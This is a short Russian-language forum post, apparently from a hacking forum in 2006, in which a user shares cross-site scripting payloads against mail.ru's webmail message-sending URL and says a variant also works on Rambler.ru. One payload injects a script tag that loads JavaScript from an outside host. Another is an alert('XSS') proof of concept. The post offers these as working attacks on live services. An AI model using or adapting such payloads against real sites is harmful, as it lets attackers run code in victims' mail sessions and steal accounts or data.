Тема: XSS на mail.ru
Показать сообщение отдельно

  #17  
Старый 09.10.2006, 03:01
Actu@l SpY
Новичок
Регистрация: 05.06.2006
Сообщений: 25
Провел на форуме:
328074

Репутация: 74
По умолчанию

выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>

Последний раз редактировалось Actu@l SpY; 09.10.2006 в 04:34..
 
Ответить с цитированием